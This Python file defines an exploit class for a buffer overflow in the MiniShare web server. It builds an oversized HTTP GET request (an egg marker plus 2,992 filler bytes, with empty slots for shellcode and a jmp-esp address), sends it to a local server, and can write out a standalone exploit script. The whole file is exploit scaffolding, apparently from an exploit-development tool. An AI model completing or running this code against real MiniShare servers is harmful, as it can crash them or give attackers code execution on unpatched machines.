class-minishare.py

import socket, sys, struct, subprocess, os
from threading import Thread
from functools import wraps
from time import sleep

def run_async(func):
	"""
	function decorator, intended to make "func" run in a separate thread (asynchronously).
	@return: the created Thread object

	E.g.:
	@run_async
	def task1():
		do_something

	@run_async
	def task2():
		do_something_too

	t1 = task1()
	t2 = task2()
	...
	t1.join()
	t2.join()
	"""
	@wraps(func)
	def async_func(*args, **kwargs):
		func_hl = Thread(target = func, args = args, kwargs = kwargs)
		func_hl.start()
		return func_hl

	return async_func

class Exploit():
	"""
	class that contains the exploit, and that can be used to build it
	"""
	def __init__(self):
		self.egg = 'EGGG'
		self.shellcode = ''
		self.jmpesp = ''
		self.prebuff = ''
		self.postbuff = ''
		self.buffer = [self.egg*2, "A"*2992]
		self.file_based = False
		self.filename = ''
		self.command = 'C:\\Program Files (x86)\\MiniShare\\minishare.exe'

	@run_async
	def exploit(self):
		"""
		This function runs the actual exploit
		"""
		sleep(1)
		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		sock.connect(('127.0.0.1',80))
		#Test 1
		message = "GET " + ''.join(self.buffer) + " HTTP/1.1\r\n\r\n"
		sock.send(message)
		sock.close()
		
	def get_buffer(self):
		return self.buffer
	
	def set_buffer(self,buff):
		self.buffer = buff
		
	def get_buffer_length(self):
		return len(''.join(self.buffer))
	
	def get_egg(self):
		return self.egg
	
	def set_egg(self,egg):
		self.egg = egg

	def get_filename(self):
		return self.filename
	
	def set_filename(self,filename):
		self.filename = filename
	
	def is_filebased(self):
		return self.file_based

	def get_command(self):
		return self.command

	def save(self):
		f = open('minishare_exploit.py','w')
		f.write("import socket\n\n" + 
				"sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" +
				"sock.connect(('127.0.0.1',80))\n" +
				"message = 'GET " + ''.join('\\x%02x' % ord(c) for c in ''.join(self.buffer)) + " HTTP/1.1\\r\\n\\r\\n'\n" +
				"sock.send(message)\n" +
				"sock.close()\n")
		f.close()